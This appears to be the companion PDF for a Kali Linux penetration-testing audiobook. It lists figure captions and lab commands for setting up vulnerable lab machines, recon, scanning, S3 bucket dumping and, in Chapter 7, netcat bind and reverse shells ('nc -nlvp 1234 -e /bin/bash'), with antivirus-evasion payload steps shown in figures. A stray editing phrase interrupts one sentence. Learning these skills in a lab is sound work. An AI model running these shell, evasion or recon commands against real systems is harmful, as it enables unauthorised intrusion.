Preface

To get the most out of this audiobook

To get the most out of this audiobook, it's recommended to have a solid foundation in
networking, such as understanding common network and application protocols of the
TCP/IP, IP addressing, routing and switching concepts, and the roles and function of
networking devices and security appliances. Knowing virtualization technologies such as
hypervisors and their components will be beneficial as most labs are built within a
virtualized environment to reduce the need to purchase additional systems.
All labs and exercises are built on a system running Windows 10 Home as the host
operating system, a multicore processor with virtualization enabled, 16 GB of RAM, and
300 GB of free storage for the virtual machines. A dedicated GPU will be needed to
perform password cracking using a GPU-based tool and two wireless network adapters
that support packet injection and operate at 2.4 and 5 GHz.
Oracle VM VirtualBox was the preferred choice when choosing a hypervisor as it
provides better virtual networking capabilities as compared to other solutions.
However, if you prefer to use another hypervisor product such as VMware, you are free
to do so, but please keep in mind the fact that all labs within this audiobook were
completed and tested using Oracle VM VirtualBox.

Note
While the content and labs found within this audiobook are based on Kali Linux 2021,
the concepts and exercises are applicable to later versions of Kali Linux that will be
released in the future.

After completing this audiobook, equipped with your imagination and newfound skills,
attempt to create additional lab scenarios and even extend your lab environment by
adding additional virtual machines to improve your skillset. This will help you to
continue learning and further develop your skills as an aspiring ethical hacker and
penetration tester.

Download the images, links, tables, and code and

command
Packt audiobooks have been selected for a seamless audio experience. Some topics,
however, do come with elements like images, links, tables, and code that aren't natural
for this medium. We've made minor changes to the content of the audiobooks so that
you can listen to the audio without needing to refer to these visual elements unless
necessary. To give you the choice between listening to just the audio and listening to
the audio while following the example code and GUI steps, we've created a PDF that
contains all the elements you need to achieve the goals of this audiobook. All references
to images and code in the audiobook can be found within this PDF. You can download
the PDF from github.com/PacktPublishing/The-Ultimate-Kali-Linux-Book-Audiobook
 Chapter 1

Figure 1.1 – Penetration testing phases

Figure 1.2 – Pre-engagement

Figure 1.3 – Hacking phases

Figure 1.4 – Cyber Kill Chain

 Figure 1.5 – USB ninja cable

Figure 1.6 – USB rubber ducky

Figure 1.7 – C2 operations

Further reading
To learn more on the subject, check out the following links:
 Understanding network port numbers:
https://hub.packtpub.com/understanding-network-port-numbers-tcp-udp-
and-icmp-on-an-operating-system/

 Vulnerabilities in the Application and Transport Layer of the TCP/IP stack:

https://hub.packtpub.com/vulnerabilities-in-the-application-and-transport-
layer-of-the-tcp-ip-stack/

 Understanding IP address spaces: https://hub.packtpub.com/understanding-

address-spaces-and-subnetting-in-ipv4-tutorial/

 The Cyber Kill Chain: https://www.lockheedmartin.com/en-

us/capabilities/cyber/cyber-kill-chain.html
 Chapter 2
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Oracle VM VirtualBox: https://www.virtualbox.org/wiki/Downloads

 Oracle VM VirtualBox Extension Pack:

https://www.virtualbox.org/wiki/Downloads

 Vagrant: https://www.vagrantup.com/downloads

 Kali Linux 2021.2: https://www.kali.org/get-kali/

 OWASP Juice Shop: https://owasp.org/www-project-juice-shop/

 Metasploitable 2:
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

 Metasploitable 3: https://app.vagrantup.com/rapid7/boxes/metasploitable3-
win2k8

 OWASP Broken Web Applications:

https://sourceforge.net/projects/owaspbwa/files/
Images

Figure 2.1 – Lab topology

Figure 2.2 – VirtualBox download page

Figure 2.3 – VirtualBox extension pack

Figure 2.4 – Kali Linux virtual image

Figure 2.5 – Downloading Kali Linux

Figure 2.6 – Importing Kali Linux

 Figure 2.7 – Starting the import process

Figure 2.8 – Enabling nested virtualization on the virtual machine

Figure 2.9 – Accessing the settings

 Figure 2.10 – Adjusting Base Memory

Figure 2.11 – Internet assigned network adapter

Figure 2.12 – Adding the PentestNet adapter

Figure 2.13 – Assigning the Red Team network

Figure 2.14 – Logon window on Kali Linux

Figure 2.15 – List of tools on Kali Linux

Figure 2.16 – Checking the IP address of the network adapter

Figure 2.17 – Testing internet connectivity

 Figure 2.18 – Updating the source lists

Figure 2.19 – Upgrading packages on Kali Linux

Figure 2.20 – Creating a virtual machine

Figure 2.21 – Hard Disk Selector

Figure 2.22 – Attaching a virtual hard drive
Figure 2.23 – Network adapter configurations

Figure 2.24 – Verifying network connectivity

Figure 2.25 – Installing Vagrant plugins

Figure 2.26 – Selecting the preferred hypervisor

Figure 2.27 – Metasploitable 3 download status

Figure 2.28 – Metasploitable 3 networking settings
Figure 2.29 – Dual-homed network connection

Figure 2.30 – Choosing a provider

Figure 2.31 – Connecting to the HiddenNet virtual network

Figure 2.32 – Installing Docker PGP keys

Figure 2.33 – Configuring the Docker repository

Figure 2.34 – Installing Docker on Kali Linux

 Figure 2.35 – OWASP Juice Shop Docker container

Figure 2.36 – Starting the OWASP Juice Shop Docker container

Figure 2.37 – OWASP Juice Shop user interface

Figure 2.38 – OWASP BWA virtual machine

 Figure 2.39 – Selecting the virtual disk file

Figure 2.40 – Network adapter configurations

 Figure 2.41 – Verifying network connectivity

Code and Commands

C:\> cd C:\Program Files\Oracle\VirtualBox
C:\Program Files\Oracle\VirtualBox> vboxmanage dhcpserver
add --network=PentestNet --server-ip=172.30.1.1 --lower-
ip=172.30.1.20 --upper-ip=172.30.1.50 --
netmask=255.255.255.0 --enable
Command 2.1
C:\> cd C:\Program Files\Oracle\VirtualBox
C:\Program Files\Oracle\VirtualBox> vboxmanage dhcpserver
add --network=HiddenNet --server-ip=10.11.12.1 --lower-
ip=10.11.12.20 --upper-ip=10.11.12.50 --
netmask=255.255.255.0 --enable
Command 2.2

C:\> cd C:\Program Files\Oracle\VirtualBox

C:\Program Files\Oracle\VirtualBox> vboxmanage dhcpserver
add --network=RedTeamLab --server-ip=192.168.42.1 --lower-
ip=192.168.42.20 --upper-ip=192.168.42.50 --
netmask=255.255.255.0 --enable
Command 2.3

C:\> cd C:\Program Files\Oracle\VirtualBox

C:\Program Files\Oracle\VirtualBox> VBoxManage.exe list vms
Command 2.4

C:\Program Files\Oracle\VirtualBox> VBoxManage.exe modifyvm

"VM Name" --nested-hw-virt on
Command 2.5

C:\Users\Slayer> vagrant plugin install vagrant-reload

C:\Users\Slayer> vagrant plugin install vagrant-vbguest
Command 2.6

C:\Users\Slayer> vagrant box add rapid7/metasploitable3-

win2k8
Command 2.7
C:\Users\Slayer> cd .vagrant.d\boxes
C:\Users\Slayer\.vagrant.d\boxes> vagrant init
metasploitable3-win2k8
C:\Users\Slayer\.vagrant.d\boxes> vagrant up
Command 2.8

C:\Users\Slayer> vagrant box add rapid7/metasploitable3-

ub1404
Command 2.9

C:\Users\Slayer> cd .vagrant.d
C:\Users\Slayer\.vagrant.d> del Vagrantfile
C:\Users\Slayer\.vagrant.d> vagrant init metasploitable3-
ub1404
C:\Users\Slayer\.vagrant.d> vagrant up
Command 2.10

curl -fsSL https://download.docker.com/linux/debian/gpg |

gpg --dearmor | sudo tee /usr/share/keyrings/docker-
archive-keyring.gpg >/dev/null
Command 2.11

echo 'deb [arch=amd64 signed-by=/usr/share/keyrings/docker-

archive-keyring.gpg]
https://download.docker.com/linux/debian buster stable' |
sudo tee /etc/apt/sources.list.d/docker.list
Command 2.12

sudo apt-get update

Command 2.13

sudo apt install -y docker-ce docker-ce-cli containerd.io

Command 2.14
sudo docker pull bkimminich/juice-shop
Command 2.15

sudo docker run --rm -p 3000:3000 bkimminich/juice-shop

Command 2.16

Further reading
To learn more on the topics that were covered in this chapter, take a look at the
following resources:
 Why secure web-based applications? https://hub.packtpub.com/why-secure-
web-based-applications-with-kali-linux/

 Kali Linux 2021.2 release information: https://www.kali.org/blog/kali-linux-

2021-2-release/
 Chapter 3
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Oracle VM VirtualBox: https://www.virtualbox.org/

 Windows Server 2019: https://www.microsoft.com/en-

us/evalcenter/evaluate-windows-server-2019

 Windows 10 Enterprise: https://www.microsoft.com/en-

us/evalcenter/evaluate-windows-10-enterprise

 Ubuntu Server 20.04.2: https://ubuntu.com/download/server

 FreeRadius: https://freeradius.org/

 A physical wireless router that supports the WEP, WPA2-Personal, and WPA2-
Enterprise security standards
Images

Figure 3.1 – Windows red teaming lab topology

Figure 3.2 – User accounts

 Figure 3.3 – Windows Setup

Figure 3.4 – VirtualBox Guest Additions

 Figure 3.5 – Windows Explorer

Figure 3.6 – Windows Run application

 Figure 3.7 – System Properties

Figure 3.8 – Enabling network discovery

Figure 3.9 – Turning on network discovery on Windows 10

Figure 3.10 – Server Manager

 Figure 3.11 – Installation Type

Figure 3.12 – Promote this server to a domain controller

Figure 3.13 – Deployment Configuration

Figure 3.14 – Logging in to the domain

Figure 3.15 – Group Policy Management

Figure 3.17 – Disabling antimalware protection
 Figure 3.16 – Editing a GPO

Figure 3.18 – Verifying shared folders

Figure 3.19 – Creating an SPN on Windows Server

 Figure 3.20 – Sign-in window

Figure 3.21 – Wireless penetration testing lab

 Figure 3.23 – Creating a virtual hard disk

Figure 3.24 – Configuring network settings

Figure 3.25 – Attaching a bootable disk

Figure 3.26 – FreeRadius files

 Figure 3.27 – Creating a user account

Figure 3.28 – Creating an AAA client account

Figure 3.29 – Verifying the FreeRadius service's status

Figure 3.30 – Verifying RADIUS open ports

Figure 3.31 – Changing the wireless network's name

 Figure 3.32 – Configuring wireless security

Code and Commands

C:\Users\Administrator> net user bob Password1 /add /domain
C:\Users\Administrator> net user alice Password1 /add
/domain
C:\Users\Administrator> net user johndoe Password123 /add
/domain
C:\Users\Administrator> net user sqladmin Password45 /add
/domain
Command 3.1
C:\Users\Administrator> net localgroup "Administrators"
johndoe /add
C:\Users\Administrator> net group "Domain Admins" johndoe
/add /domain
C:\Users\Administrator> net group "Enterprise Admins"
johndoe /add /domain
C:\Users\Administrator> net group "Group Policy Creator
Owners" johndoe /add /domain
C:\Users\Administrator> net group "Schema Admins" johndoe
/add /domain
Command 3.2

C:\Users\Administrator> net localgroup "Administrators"

sqladmin /add
C:\Users\Administrator> net group "Domain Admins" sqladmin
/add /domain
C:\Users\Administrator> net group "Enterprise Admins"
sqladmin /add /domain
C:\Users\Administrator> net group "Group Policy Creator
Owners" sqladmin /add /domain
C:\Users\Administrator> net group "Schema Admins" sqladmin
/add /domain
Command 3.3

C:\Users\Administrator> cd\
C:\> mkdir CorporateFileShare
C:\> net share DataShare=c:\CorporateFileShare
Command 3.4
C:\Users\Administrator> setspn -a
DC1/sqladmin.REDTEAMLAB.local:64123 REDTEAMLAB\sqladmin
Command 3.5

C:\Windows\system32> netsh interface ip add dns "Ethernet"

192.168.42.22
Command 3.6

C:\Windows\system32> powershell
PS C:\Windows\system32> Add-Computer -DomainName
RedTeamLab.local -Restart
Command 3.7

C:\Users\Administrator> net localgroup "Administrators"

redteamlab\bob /ADD
C:\Users\Administrator> net localgroup "Administrators"
redteamlab\alice /ADD
Command 3.8

C:\Users\Administrator> cd \
C:\> mkdir SharedData
C:\> net share DataShare=c:\SharedData
Command 3.9

glen@freeradius:~$ sudo apt update

glen@freeradius:~$ sudo apt install freeradius
Command 3.10

glen@freeradius:~$ sudo ls -l /etc/freeradius/

Command 3.11
glen@freeradius:~$ sudo ls -l /etc/freeradius/3.0
Command 3.12

glen@freeradius:~$ sudo vi /etc/freeradius/3.0/users

Command 3.13

bob Cleartext-Password := "password123"

Code 3.1

glen@freeradius:~$ sudo vi /etc/freeradius/3.0/clients.conf

Command 3.14

client 172.16.17.199 {
secret = radiuspassword1
shortname = CorpAP
}
Code 3.2

glen@freeradius:~$ sudo systemctl restart freeradius

glen@freeradius:~$ sudo systemtctl status freeradius
Command 3.15

Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
 Active Directory Domain Services: https://docs.microsoft.com/en-
us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-
domain-services-overview

 Understanding FreeRADIUS: https://freeradius.org/documentation/

 Chapter 4
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Osintgram: https://github.com/Datalux/Osintgram

 Sherlock: https://github.com/sherlock-project/sherlock

Images

Figure 4.1 – Footprinting

Figure 4.2 – OSINT sources

Figure 4.3 – VPN servers

 Figure 4.4 – Proxy chaining

Figure 4.5 – Locating the proxychains configuration file

Figure 4.6 – Editing the proxychain's configuration file

 Figure 4.7 – Adding proxies

Figure 4.8 – Using proxychains

Figure 4.9 – TOR

Figure 4.10 – Setting the proxy list to use TOR only

Figure 4.11 – TOR status check

Figure 4.12 – TOR via proxychains

 Figure 4.13 – WHOIS

Figure 4.14 – Job posting

Figure 4.15 – Hunter.io

Figure 4.16 – Employees' data

Figure 4.17 – Data sources

Figure 4.18 – Installing Recon-ng modules

Figure 4.19 – Displaying the modules

Figure 4.20 – Viewing workspaces

 Figure 4.21 – Searching for modules

Figure 4.22 – Viewing the required parameters

Figure 4.23 – Executing a module

Figure 4.24 – Searching a module

Figure 4.25 – Viewing hosts

 Figure 4.26 – Viewing contact details

Figure 4.27 – Activity summary

Figure 4.28 – Summary of collected data

Figure 4.29 – Reporting modules

Figure 4.30 – Generating a report

 Figure 4.31 – HTML report

Figure 4.32 – Recon-ng web user interface

 Figure 4.33 – Subdomains

Figure 4.34 – Adding user credentials

Figure 4.35 – Collecting information

Figure 4.36 – Collected data

 Figure 4.37 – Sherlock

Figure 4.38 – Viewing the collected data

Figure 4.39 – Searching for a specific operating system

 Figure 4.40 – Discovering open ports

Figure 4.41 – Web technologies and vulnerabilities

Figure 4.42 – Discovering running services

Figure 4.43 – Censys results

 Figure 4.44 – Opening Maltego

Figure 4.45 – Maltego – Production Selection page

Figure 4.46 – Maltego's user interface

Figure 4.47 – Discovering mail servers

Figure 4.48 – Gathering the IP addresses of assets

Figure 4.49 – Gathering name servers

Figure 4.50 – Discovering web links on the target's website

Figure 4.51 – Discovering email addresses

 Figure 4.52 – Netcraft

Figure 4.53 – Netcraft results

Figure 4.54 – Hosting history

 Figure 4.55 – Server- and client-side technologies

Code and Commands

kali@kali:~$ sudo vi /etc/proxychains4.conf
Command 4.1

kali@kali:~$ sudo apt update

kali@kali:~$ sudo apt install tor
Command 4.2

kali@kali:~$ sudo vi /etc/proxychains4.conf

Command 4.3
kali@kali:~$ proxychains4 firefox
Command 4.4

[recon-ng][default] > marketplace install all

Command 4.5

[recon-ng][default] > workspaces create pentest1

Command 4.6

[recon-ng][pentest1][whois_pocs] > options set SOURCE

microsoft.com
Figure 4.7

[recon-ng][pentest1] > modules load recon/domains-

hosts/bing_domain_web
[recon-ng][pentest1][bing_domain_web] > info
Command 4.8

[recon-ng][pentest1] > modules load reporting/html

[recon-ng][pentest1] > info
[recon-ng][pentest1][html] > options set CREATOR Glen
[recon-ng][pentest1][html] > options set CUSTOMER MS-Target
[recon-ng][pentest1][html] > options set FILENAME
/home/kali/PenTest1-Report.html
[recon-ng][pentest1][html] > run
Command 4.9

kali@kali:~$ recon-web
Command 4.10
kali@kali:~$ theHarvester -h
Command 4.11

kali@kali:~$ theHarvester -d microsoft.com --dns-server

8.8.8.8 -b linkedin
Command 4.12

kali@kali:~$ theHarvester -d microsoft.com -b bing

Command 4.13

kali@kali:~$ git clone

https://github.com/Datalux/Osintgram.git
kali@kali:~$ sudo apt-get install python3-venv
Command 4.14

kali@kali:~$ cd Osintgram
kali@kali:~/Osintgram$ sudo python3 -m venv venv
kali@kali:~/Osintgram$ source venv/bin/activate
(venv)kali@kali:~/Osintgram$ sudo pip3 install -r
requirements.txt
Command 4.15

(venv)kali@kali:~/Osintgram$ make setup

Command 4.16

(venv)kali@kali:~/Osintgram$ sudo python3 main.py microsoft

Command 4.17

kali@kali:~$ sudo apt update

kali@kali:~$ git clone https://github.com/sherlock-
project/sherlock.git
Command 4.18
kali@kali:~$ cd sherlock
kali@kali:~/sherlock$ python3 -m pip install -r
requirements.txt
Command 4.19

kali@kali:~/sherlock$ python3 sherlock microsoft --timeout

5
Command 4.20

Further reading
To learn more about Make this a single sentence.
open source intelligence, please go to https://hub.packtpub.com/open-source-
intelligence/.
 Chapter 5
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Metasploitable 2:
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

 OWASP Broken Web Applications:

https://sourceforge.net/projects/owaspbwa/files/

 S3Scanner: https://github.com/sa7mon/S3Scanner

Images

Figure 5.1 – Filtering results from a domain

 Figure 5.2 – Keyword search

Figure 5.3 – Including multiple keywords

 Figure 5.4 – Filtering by file types

Figure 5.5 – Filtering by specific URLs

 Figure 5.6 – Filtering by specific keywords

Figure 5.7 – Google's Advanced search menu

Figure 5.8 – Advanced search parameters

Figure 5.9 – Google Hacking Database

 Figure 5.10 – DNS query

Figure 5.11 – DNS response

Figure 5.12 – Client establishing a connection

Figure 5.13 – DNS enumeration

Figure 5.14 – Gathering DNS records

Figure 5.15 – Retrieving name servers

Figure 5.16 – Retrieving DNS records

Figure 5.17 – Zone transfer using DNSEnum

Figure 5.18 – DNS records

Figure 5.19 – Checking an IP address

Figure 5.20 – Spiderfoot web interface

Figure 5.21 – Sources

Figure 5.22 – New Scan

 Figure 5.23 – Setting a target

Figure 5.24 – Spiderfoot use cases

Figure 5.25 – Spiderfoot graph

Figure 5.26 – Viewing data

 Figure 5.27 – Source data elements

Figure 5.28 – Discovering subdomains

 Figure 5.29 – Output file

Figure 5.30 – Screenshots

Figure 5.31 – Network-based firewall

Figure 5.32 – Checking network interfaces

Figure 5.33 – MAC Changer options

Figure 5.34 – Changing MAC address

 Figure 5.35 – Checking your network

Figure 5.36 – Netdiscover host discovery

Figure 5.37 – Ping sweep using Nmap

Figure 5.38 – Discovering open ports

Figure 5.39 – Advanced scan results

Figure 5.40 – Operating system profiling

Figure 5.41 – Decoys

 Figure 5.42 – TCP 3-way handshake

Figure 5.44 – Stealth scanning using Nmap

Figure 5.45 – Wireshark capture

Figure 5.46 – Searching the port scanning modules

 Figure 5.47 – Viewing options

Figure 5.48 – TCP SYN scan

Figure 5.49 – Searching for modules

Figure 5.50 – Viewing module options

 Figure 5.51 – Enumerating SMB

Figure 5.52 – Discovering shared drives

Figure 5.53 – Displaying the contents of a shared drive

Figure 5.54 – SSH version checker module

 Figure 5.55 – Office 365 login page

Figure 5.57 – Found a valid user account

 Figure 5.58 – S3Scanner options

Figure 5.59 – Obtaining an IP address

Figure 5.60 – Discovering an AWS S3 bucket

 Figure 5.61 – Scanning with S3Scanner

Figure 5.62 – Viewing the files within an S3 bucket

Figure 5.63 – Downloading the necessary content

Figure 5.64 – Viewing the local files

Code and Commands
kali@kali:~$ dnsrecon -h
Command 5.1

kali@kali:~$ host -l zonetransfer.me nsztm1.digi.ninja

Command 5.2

kali@kali:~$ dnsenum zonetransfer.me

Command 5.3

kali@kali:~$ sudo spiderfoot -l 172.16.17.71:80

Command 5.4

kali@kali:~$ sudo apt update

kali@kali:~$ sudo apt install dnsmap
Command 5.5

kali@kali:~$ dnsmap microsoft.com

Command 5.6

kali@kali:~$ sudo apt update

kali@kali:~$ sudo apt install sublist3r
Command 5.7

kali@kali:~$ sublist3r -d microsoft.com

Command 5.8

kali@kali:~$ sublist3r -d microsoft.com -o subdomains.txt

Command 5.9
kali@kali:~$ git clone
https://github.com/FortyNorthSecurity/EyeWitness
Command 5.10

kali@kali:~$ cd EyeWitness/Python/setup
kali@kali:~/EyeWitness/Python/setup$ sudo ./setup.sh
Command 5.11

kali@kali:~/EyeWitness/Python/setup$ cd ..
Command 5.12

kali@kali:~/EyeWitness/Python$ ./EyeWitness.py --web -f

/home/kali/subdomains.txt -d /home/kali/screenshots --
prepend-https
Command 5.13

kali@kali:~$ sudo ifconfig eth0 down

Command 5.14

kali@kali:~$ sudo macchanger -A eth0

Command 5.15

kali@kali:~$ sudo ifconfig eth0 up

Command 5.16

kali@kali:~$ sudo netdiscover -r 172.30.1.0/24

Command 5.17

kali@kali:~$ nmap -sn 172.30.1.0/24 --exclude 172.30.1.27

Command 5.18

kali@kali:~$ nmap 172.30.1.26

Command 5.19
kali@kali:~$ nmap -A -T4 -p- 172.30.1.26
Command 5.20

kali@kali:~$ nmap 172.30.1.26 –D 172.30.1.20, 172.30.1.21,

172.30.1.22
Command 5.21

kali@kali:~$ nmap --spoof-mac 0 172.30.1.26

Command 5.22

kali@kali:~$ sudo nmap -S 172.30.1.23 -e eth0 172.30.1.26

Command 5.23

kali@kali:~$ sudo nmap -sS -p80 172.30.1.26

Command 5.24

kali@kali:~$ sudo msfconsole

Command 5.25

msf6 > search portscan

Command 5.26

msf6 > use auxiliary/scanner/portscan/syn

msf6 auxiliary(scanner/portscan/syn) > options
Command 5.27

msf6 auxiliary(scanner/portscan/syn) > set RHOSTS

172.30.1.26
msf6 auxiliary(scanner/portscan/syn) > run
Command 5.28

kali@kali:~$ msfconsole
Command 5.29
msf6 > search smb_version
Command 5.30

msf6 > use auxiliary/scanner/smb/smb_version

msf6 auxiliary(scanner/smb/smb_version) > options
Command 5.31

msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS

172.30.1.26
msf6 auxiliary(scanner/smb/smb_version) > run
Command 5.32

kali@kali:~$ smbmap -H 172.30.1.26

Command 5.33

kali@kali:~$ smbmap -H 172.30.1.26 -r tmp

Command 5.34

kali@kali:~$ sudo msfconsole

Command 5.35

msf6 > use auxiliary/scanner/ssh/ssh_version

msf6 auxiliary(scanner/ssh/ssh_version) > options
Command 5.36

msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS

172.30.1.26
msf6 auxiliary(scanner/ssh/ssh_version) > run
Command 5.37
[+] 172.30.1.26:22 - SSH server version: SSH-2.0-
OpenSSH_4.7p1 Debian-8ubuntu1 ( service.version=4.7p1
openssh.comment=Debian-8ubuntu1 service.vendor=OpenBSD
service.family=OpenSSH service.product=OpenSSH
service.cpe23=cpe:/a:openbsd:openssh:4.7p1 os.vendor=Ubuntu
os.family=Linux os.product=Linux os.version=8.04
os.cpe23=cpe:/o:canonical:ubuntu_linux:8.04
service.protocol=ssh fingerprint_db=ssh.banner )
Command 5.38

kali@kali:~$ sudo pip3 install s3scanner

Command 5.40

kali@kali:~$ aws configure

Command 5.41

kali@kali:~$ nslookup
> flaws.cloud
Command 5.42

> set type=ptr

> 52.218.228.98
Command 5.43

kali@kali:~$ s3scanner scan --bucket flaws.cloud

Command 5.44

kali@kali:~$ aws s3 ls s3://flaws.cloud/ --region us-west-2

--no-sign-request
Command 5.45
kali@kali:~$ mkdir S3_Bucket
kali@kali:~$ s3scanner dump --bucket flaws.cloud --dump-dir
/home/kali/S3_Bucket/
Command 5.46

kali@kali:~$ cd S3_Bucket
kali@kali:~/S3_Bucket$ ls -l
Command 5.47

kali@kali:~/S3_Bucket$ cat secret-dd02c7c.html

Command 5.48

Further reading
To learn more about what was covered in this chapter, take a look at the following
resources:
 Why is DNSSEC important?: https://www.icann.org/resources/pages/dnssec-
what-is-it-why-important-2019-03-05-en

 DNS Zone Transfer Protocol: https://datatracker.ietf.org/doc/html/rfc5936

 Nmap reference guide: https://nmap.org/book/man.html

 Information gathering with Metasploit: https://www.offensive-

security.com/metasploit-unleashed/information-gathering/

 Amazon S3 user guide:

https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html

 Amazon S3 Security: https://aws.amazon.com/s3/security/

 Chapter 6
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Nessus: https://www.tenable.com/products/nessus/nessus-essentials

 Greenbone Vulnerability Manager: https://github.com/greenbone/gvmd

Images

Figure 6.1 – Nessus installer

Figure 6.2 – Changing directories

 Figure 6.3 – Nessus installation process

Figure 6.4 – Web browser security warning

 Figure 6.5 – Selecting the Nessus version

Figure 6.6 – Nessus activation code window

 Figure 6.7 – Registering Nessus

Figure 6.8 – Creating a user account

Figure 6.9 – The New Scan button

Figure 6.10 – Scanning templates

 Figure 6.11 – Scan options

Figure 6.12 – Viewing the completed scans

 Figure 6.13 – Scan results

Figure 6.14 – List of security vulnerabilities

Figure 6.15 – Viewing a vulnerability's details

Figure 6.16 – The vulnerability risk factor

Figure 6.17 – Identifying vulnerability scoring metrics

Figure 6.18 – VPR scoring system

Figure 6.19 – Reporting the output

Figure 6.20 – PDF reporting options

Figure 6.21 – Executive Summary report

Figure 6.22 – Custom report

Figure 6.23 – Discovering vulnerabilities

Figure 6.24 – Searching for exploits

 Figure 6.25 – Searchsploit

Figure 6.26 – Searching for an exploit module

Figure 6.27 – Displaying information about an exploit module

Figure 6.28 – Vulnerability scanning

Figure 6.29 – The GVM setup process

Figure 6.30 – User account

Figure 6.31 – Security warning

Figure 6.32 – Sign-in window

 Figure 6.33 – Adding a target

Code and Commands

kali@kali:~$ cd Downloads
kali@kali:~/Downloads$ ls
Command 6.1

kali@kali:~/Downloads$ sudo dpkg -i Nessus-8.15.0-

debian6_amd64.deb
Command 6.2

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Command 6.3

https://www.first.org/cvss/calculator/3.0#
Command 6.4

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:
L/PR:N/UI:N/S:U/C:H/I:H/A:H
Command 6.5

kali@kali:~$ nmap --script ftp-vsftpd-backdoor 172.30.1.26

Command 6.6
kali@kali:~$ nmap --script vuln 172.30.1.26
Command 6.7

kali@kali:~$ sudo apt update

kali@kali:~$ sudo apt install gvm
Command 6.8

kali@kali:~$ sudo gvm-setup

Command 6.9
 Chapter 7
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Shellter: https://www.shellterproject.com/

 Alfa AWUS036NHA High Gain Wireless B/G/N USB adapter

 Alfa AWUS036ACH Long-Range Dual-Band AC1200 Wireless USB 3.0 Wi-Fi

adapter

Not all wireless cards support monitor mode and packet injection. However, making a
minor revision to a chipset can cause the card to not work in monitor mode, and some
cards may need the drivers to be compiled and may not work out of the box.

Images

Figure 7.1 – Telnet packets

Figure 7.2 – Sensitive data

Figure 7.3 – Bind shell

 Figure 7.4 – Reverse shell

Figure 7.5 – Determining the IP address

Figure 7.6 – Accessing the Python3 web server

Figure 7.7 – Communicating via a remote shell

Figure 7.8 – Sending and receiving a message

 Figure 7.9 – Bind shell

Figure 7.10 – Verifying the connection

Figure 7.11 – Reverse shell

Figure 7.12 – Checking the payload

Figure 7.13 – Checking payload2

 Figure 7.14 – Checking payload3

Figure 7.15 – Choosing the mode of operation

Figure 7.16 – Specifying the Windows executable file

Figure 7.17 – Enabling stealth mode

Figure 7.18 – Configuring the payload using Shellter

Figure 7.19 – Verification

Figure 7.20 – Threat detection rating

Figure 7.21 – Delivering the payload

Figure 7.22 – Checking the user

Figure 7.23 – Alfa AWUS036NHA wireless network adapter

Figure 7.24 – Alfa AWUS036ACH wireless network adapter

Figure 7.25 – Virtual machine settings

Figure 7.26 – Adding a USB device

 Figure 7.27 – Adding a USB adapter

Figure 7.28 – Wireless network adapter

Figure 7.29 – Viewing the wireless adapter's status

Figure 7.30 – Network adapter settings

Figure 7.31 – Adding the USB wireless adapter

Figure 7.32 – Identifying the chipset

Figure 7.33 – Displaying the wireless network adapters

Figure 7.34 – Checking the wireless interfaces

Figure 7.35 – Verifying the interface's status

 Figure 7.36 – Testing packet injection

Figure 7.37 – Verifying the interface's status

Figure 7.38 – Checking the adapter's status

Figure 7.39 – Terminating processes

 Figure 7.40 – Enabling monitor mode

Figure 7.41 – Checking the monitor interface

Figure 7.42 – Checking the packet injection's status

Figure 7.43 – Disabling monitor mode

 Figure 7.44 – Checking the interface's status

Code and Commands

kali@kali:~$ cd /usr/share/windows-binaries
kali@kali:/usr/share/windows-binaries$ python3 -m
http.server 8080
Command 7.1

kali@kali:~$ nc -nlvp 1234

Command 7.2

C:\Users\Bob> nc -nv 172.30.1.29 1234

Command 7.3

kali@kali:~$ nc -nlvp 1234 -e /bin/bash

Command 7.4

C:\Users\Bob>nc -nv 172.30.1.29 1234

Command 7.5
kali@kali:~$ nc -nlvp 1234
Command 7.6

